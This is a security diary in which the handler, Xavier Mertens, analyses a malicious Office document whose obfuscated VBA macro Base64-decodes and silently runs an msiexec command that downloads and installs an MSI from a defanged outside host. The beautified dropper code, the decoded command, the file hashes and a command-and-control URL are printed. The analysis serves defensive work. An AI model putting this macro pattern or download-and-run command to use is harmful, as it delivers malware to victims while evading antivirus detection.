For a while, ISC handlers have demonstrated several obfuscation techniques via our diaries. We always told you that attackers are trying to find new techniques to hide their content to not be flagged as malicious by antivirus products. Such of them are quite complex. And sometimes, we find documents that have a very low score on VT. Here is a sample that I found (SHA256: bac1a6c238c4d064f8be9835a05ad60765bcde18644c847b0c4284c404e38810). It gets a score of 6/59[1] which is not bad (from an attacker perspective). Is it a targeted attack? A new “APT” (buzzword!), not really…

The sample gets my attention because it was flagged as malicious by only 6 antivirus products and none from the top players. When you open it, you see a classic warning message:

The goal is to make the victim execute the VBS macro attached to the document. Just go to the ‘Macro’ menu and open the macro called ‘TYpZVAnvPqNdqkDfBqeG’. The macro is of course obfuscated but it’s very easy to read the code. Just garbage code has been added with never-reached condition blocks and dummy variables:

Dim RSngVushPknGEPaVHjxjeSnJFJQjylGoIAcYFPErxtqoWOecXBdAw As Boolean
If 30 = 33 Then
Dim qEzfeaMeJjeeyyDmBQreGmlbymqeoLxIFsSwdtbos As Byte
Dim MnKMKYQbpWllWqESXgrkhqylVYGgGJIpDm As Date
End If
Dim tybPoOaDypMWiCNeFMjEKWpYqlRkUfNwikwGqIs As Boolean
If 44 = 37 Then
Dim dKdrJZzpEScEvFybWICZCwpjTbQoyFHnxUFugfgzrvNRsbSqjJaxoipgUu As Byte
Dim YhJKrzLoGbzEurbDhHjXqrJZEpeJzOeZamGyqgDOGDUqqfOiWkAixwDgYjG As Date
End If

I beautified the code for easier reading:

Dim string1 As String
Dim string2 As String

# Base64 Decode Function
Function func1(arg1)
    string2 = "Msxml2." & "DOMDocument"
    Dim object1
    Dim var4
    Set object1 = CreateObject(string2)
    string1 = bin.base64
    Set var4 = object1.createElement("ipKHiUOXckoBg")
    var4.DataType = string1
    var4.Text = arg1
    func1 = var4.NodeTypedValue
End Function

Sub main()
    On Error Resume Next
    i = 0
    var1 = "WSCript.shell"
    Dim var2
    Set var2 = CreateObject(var1)
    var3 =func1("bQBzAGkAZQB4AGUAYwAuAGUAeABlACAALwBpACAAaAB0AHQAcAA6AC [...] gAC8AcQB1AGkAZQB0AA==")
    var2.Run var3, i
End Sub

The function ‘func1’ is just a Base64 decoder and the Base64 string is decoded to:

msiexec.exe /i hxxp://nunovidente[.]pt/_output6fd4680.msi /quiet

You can see that, like most Microsoft tools, msiexec.exe accepts an URL as a filename to automatically download it before the installation. From the msiexec.exe syntax help:

</package | /i> <Product.msi> : Installs or configures a product

Since I found the document, the payload has been removed. It was not available on VT (SHA256: 51b53eaa4fe6790b60bd2a88b934baa3de841462513904f9c8bd048414f6eece). The MSI file installs a malicious binary (SHA256: aa3fec1cbd6d6395c20d0ae1b42879b28bbe1b451625174d38d49e30b13ed455)[2] which communicates with hxxp://mountaintopbuilders[.]com/wp-admin/user/five/fre.php. Hopefully, this one has a better detection score.

This demonstrates that running a classic antivirus is mandatory but remains a weak protection. They can be easily evaded with simple obfuscation. If you’re interested in MSI files analysis, Didier wrote a diary on this topic[3].

[1] https://www.virustotal.com/#/file/bac1a6c238c4d064f8be9835a05ad60765bcde18644c847b0c4284c404e38810/detection
[2] https://www.virustotal.com/#/file/aa3fec1cbd6d6395c20d0ae1b42879b28bbe1b451625174d38d49e30b13ed455/detection
[3] https://isc.sans.edu/forums/diary/Analyzing+MSI+files/23355

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key